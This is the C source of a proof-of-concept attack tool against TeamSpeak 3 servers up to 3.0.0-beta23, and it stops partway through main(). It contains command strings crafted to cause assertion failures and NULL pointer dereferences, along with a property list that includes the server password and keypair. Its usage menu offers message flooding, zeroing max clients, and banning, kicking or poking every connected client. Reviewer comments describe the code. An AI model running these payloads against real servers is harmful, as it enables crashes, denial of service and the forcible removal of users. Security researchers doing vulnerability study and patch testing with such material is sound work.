/*
by Luigi Auriemma
*/
|
#include <stdio.h> |
#include <stdlib.h> |
#include <string.h> |
#include <stdint.h> |
#include <time.h> |
|
#ifdef WIN32 |
#include <winsock.h> |
#include "winerr.h" |
|
#define close closesocket |
#define sleep Sleep |
#define ONESEC 1000 |
#define waitms(x) sleep(x) |
#else |
#include <unistd.h> |
#include <sys/socket.h> |
#include <sys/types.h> |
#include <arpa/inet.h> |
#include <netinet/in.h> |
#include <netdb.h> |
|
#define ONESEC 1 |
#define stristr strcasestr |
#define stricmp strcasecmp |
#define waitms(x) sleep(x * 1000) |
#endif |
|
/* Short aliases for the fixed-width unsigned types used throughout the file. */
typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"       /* tool version, printed in the banner */
#define PORT        9987        /* default UDP port when none is given on the command line */
#define BUFFSZ      0x400       // max 0x1f4 for "packetType != 1"

#define SCAN_MS     40          /* delay constant; the code that uses it is outside this excerpt */

/*
 * INIT_TS3: (re)open the UDP socket and write the start of a packet into buff.
 *
 * This expands to a bare sequence of statements, not a single statement, so
 * it is only safe as a standalone line inside a braced block (never as the
 * unbraced body of an if/else/loop). It reads and writes the caller's local
 * variables sd, p and buff.
 *
 * `if (sd)` treats descriptor 0 as "no socket open yet"; main() initialises
 * sd to 0 for that reason.
 *
 * Fields written, in order (annotations are the author's own):
 *   putrr(p, 8)      tag
 *   putxx(p, 0, 16)  header...
 *   putxx(p, 0, 16)
 *   putxx(p, 2, 8)   packetType, 2 is COMMAND
 */
#define INIT_TS3                                                        \
    if (sd) close(sd);                                                  \
    sd = udp_sock();                                                    \
    p = buff;                                                           \
    p += putrr(p, 8);       /* tag */                                   \
    p += putxx(p, 0, 16);   /* header... */                             \
    p += putxx(p, 0, 16);                                               \
    p += putxx(p, 2, 8);    /* packetType 2 is COMMAND */
|
|
|
/*
 * NULL-terminated table of command strings for the "failed assertions" test.
 *
 * The usage text in main() lists mode 2 as "test the failed assertions";
 * presumably that mode walks this table, but the consuming loop is outside
 * this excerpt.
 *
 * The banner names TeamSpeak 3 <= 3.0.0-beta23 as the affected range; confirm
 * the first fixed build against the vendor's release notes before relying on
 * this list to judge whether a server is exposed.
 *
 * NOTE(review): the initialisers are string literals (char[]) while the
 * element type is u8 * (unsigned char *), so compilers report a
 * pointer-signedness mismatch here. The entries must be treated as read-only.
 */
static u8 *assert_cmds[] = {
    "banlist",
    "complainlist",
    "servernotifyunregister",
    "serverrequestconnectioninfo",
    "setconnectioninfo",
    "servernotifyregister event=server",
    NULL
};
|
/*
 * NULL-terminated table of command strings for the "NULL pointer
 * dereferences" test.
 *
 * The usage text in main() lists mode 3 as "test the NULL pointer
 * dereferences"; presumably that mode walks this table, but the consuming
 * loop is outside this excerpt.
 *
 * Every entry is a complete command line with placeholder argument values
 * (ids of 1, "name", "none", 1.2.3.4, file.txt). The file-transfer entries
 * pass the two characters backslash and slash as the path or name value.
 *
 * NOTE(review): the initialisers are string literals (char[]) while the
 * element type is u8 * (unsigned char *), so compilers report a
 * pointer-signedness mismatch here. The entries must be treated as read-only.
 */
static u8 *null_cmds[] = {
    "bandelall",
    "channelcreate channel_name=name",
    "channelsubscribe cid=1",
    "channelsubscribeall",
    "banadd ip=1.2.3.4",
    "clientedit clid=1 client_description=none",
    "messageupdateflag msgid=1 flag=1",
    "complainadd tcldbid=1 message=none",
    "complaindelall tcldbid=1",
    "ftinitupload clientftfid=1 name=file.txt cid=5 cpw= size=9999 overwrite=1 resume=0",
    "ftgetfilelist cid=1 cpw= path=\\/",
    "ftdeletefile cid=1 cpw= name=\\/",
    "ftcreatedir cid=1 cpw= dirname=\\/",
    "ftrenamefile cid=1 cpw= tcid=1 tcpw=secret oldname=\\/ newname=\\/",
    "ftinitdownload clientftfid=1 name=\\/ cid=1 cpw= seekpos=0",
    NULL
};
|
/*
 * NULL-terminated table of virtual-server property names.
 *
 * The usage text in main() says, next to mode 5 (max clients set to 0),
 * "USE bug 1 and virtualserver for more", so this list presumably enumerates
 * the properties the custom-command mode can refer to. The code that reads
 * the table is outside this excerpt.
 *
 * NOTE(review): the list mixes statistics (uptime, byte counters, packet
 * loss) with security-relevant settings such as virtualserver_password,
 * virtualserver_keypair, virtualserver_needed_identity_security_level and the
 * antiflood thresholds. When validating a patched server, the permission
 * checks on those settings are the ones to confirm.
 *
 * NOTE(review): the initialisers are string literals (char[]) while the
 * element type is u8 * (unsigned char *), so compilers report a
 * pointer-signedness mismatch here. The entries must be treated as read-only.
 */
static u8 *virtualserver[] = {
    "virtualserver_antiflood_ban_time",
    "virtualserver_antiflood_points_needed_ban",
    "virtualserver_antiflood_points_needed_kick",
    "virtualserver_antiflood_points_needed_warning",
    "virtualserver_antiflood_points_tick_reduce",
    "virtualserver_autostart",
    "virtualserver_channelsonline",
    "virtualserver_client_connections",
    "virtualserver_clientsonline",
    "virtualserver_complain_autoban_count",
    "virtualserver_complain_autoban_time",
    "virtualserver_complain_remove_time",
    "virtualserver_created",
    "virtualserver_default_channel_admin_group",
    "virtualserver_default_channel_group",
    "virtualserver_default_server_group",
    "virtualserver_download_quota",
    "virtualserver_filebase",
    "virtualserver_flag_password",
    "virtualserver_hostbanner_gfx_interval",
    "virtualserver_hostbanner_gfx_url",
    "virtualserver_hostbanner_url",
    "virtualserver_hostbutton_gfx_url",
    "virtualserver_hostbutton_tooltip",
    "virtualserver_hostbutton_url",
    "virtualserver_hostmessage",
    "virtualserver_hostmessage_mode",
    "virtualserver_icon_id",
    "virtualserver_id",
    "virtualserver_keypair",
    "virtualserver_log_channel",
    "virtualserver_log_client",
    "virtualserver_log_filetransfer",
    "virtualserver_log_permissions",
    "virtualserver_log_query",
    "virtualserver_log_server",
    "virtualserver_machine_id",
    "virtualserver_max_download_total_bandwidth",
    "virtualserver_max_upload_total_bandwidth",
    "virtualserver_maxclients",
    "virtualserver_min_client_version",
    "virtualserver_min_clients_in_channel_before_forced_silence",
    "virtualserver_month_bytes_downloaded",
    "virtualserver_month_bytes_uploaded",
    "virtualserver_name_phonetic",
    "virtualserver_needed_identity_security_level",
    "virtualserver_password",
    "virtualserver_platform",
    "virtualserver_port",
    "virtualserver_priority_speaker_dimm_modificator",
    "virtualserver_query_client_connections",
    "virtualserver_queryclientsonline",
    "virtualserver_reserved_slots",
    "virtualserver_total_bytes_downloaded",
    "virtualserver_total_bytes_uploaded",
    "virtualserver_total_packetloss_control",
    "virtualserver_total_packetloss_keepalive",
    "virtualserver_total_packetloss_speech",
    "virtualserver_total_packetloss_total",
    "virtualserver_total_ping",
    "virtualserver_upload_quota",
    "virtualserver_uptime",
    "virtualserver_version",
    NULL
};
|
|
|
/*
 * Forward declarations. The definitions are outside this excerpt, so the
 * notes below are limited to what the signatures and the INIT_TS3 macro show;
 * anything else is marked as an assumption.
 */

/* key includes the nonce (author's note); `encrypt` presumably selects the
 * direction - confirm against the definition. */
int ts3_crypt(unsigned char *key /* includes nonce */, int hdrlen,
              unsigned char *data, int data_len, int encrypt);

/* Returns the socket descriptor that INIT_TS3 stores in sd. */
int udp_sock(void);

/* put* helpers: INIT_TS3 adds each return value to the write pointer, so they
 * return the number of bytes to advance. What putrr and putmm write is
 * not visible here. */
int putrr(u8 *dst, int len);
int putmm(u8 *dst, u8 *src, int len);
int putxx(u8 *data, u32 num, int bits);     /* called with bits = 8 and 16 in INIT_TS3 */

/* Presumably sends `in` and waits for a reply in `out` - confirm. */
int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz,
              struct sockaddr_in *peer, int err);

int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);
|
|
|
int main( int argc, char *argv[]) { |
struct sockaddr_in peer; |
int sd = 0, |
i, |
len, |
bug; |
u16 port = PORT; |
u8 buff[BUFFSZ], |
*host, |
*p; |
|
#ifdef WIN32 |
WSADATA wsadata; |
WSAStartup(MAKEWORD(1,0), &wsadata); |
#endif |
|
setbuf (stdout, NULL); |
|
fputs ( "\n" |
"TeamSpeak 3 <= 3.0.0-beta23 multiple vulnerabilities " VER "\n" |
"by Luigi Auriemma\n" |
"e-mail: aluigi@autistici.org\n" |
"web: aluigi.org\n" |
"\n" , stdout); |
|
if (argc < 3) { |
printf ( "\n" |
"Usage: %s <bug> <host> [port(%d)]>\n" |
"\n" |
"Bugs and some examples:\n" |
" 1 = interface for sending any custom command\n" |
" 2 = test the failed assertions\n" |
" 3 = test the NULL pointer dereferences\n" |
"\n" |
" 4 = flooding of random server messages\n" |
" 5 = set the number of max clients to 0 (USE bug 1 and virtualserver for more)\n" |
" 6 = ban all the clients currently in the server\n" |
" 7 = unban all the banned clients\n" |
" 8 = kick all the clients currently in the server\n" |
" 9 = send a poke message to all the clients in the server\n" |
"\n" , argv[0], port); |
exit (1); |
} |
|
bug = atoi (argv[1]); |
host = argv[2]; |
if (argc > 3) port = atoi (argv[3]); |
|
<